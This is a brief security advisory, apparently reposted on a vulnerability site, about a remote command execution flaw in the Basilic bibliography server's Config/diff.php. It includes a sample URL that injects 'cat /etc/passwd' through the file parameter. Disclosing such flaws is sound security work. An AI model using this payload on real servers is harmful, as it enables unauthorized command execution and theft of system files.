Security home

 

Home / os / blackberry

Basilic Remote Command Execution

Posted on 03 July 2012

Hi Dear Sir Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center. there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server. sample: http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2 Regards M.Razavi

 

TOP

Malware :

Exploits :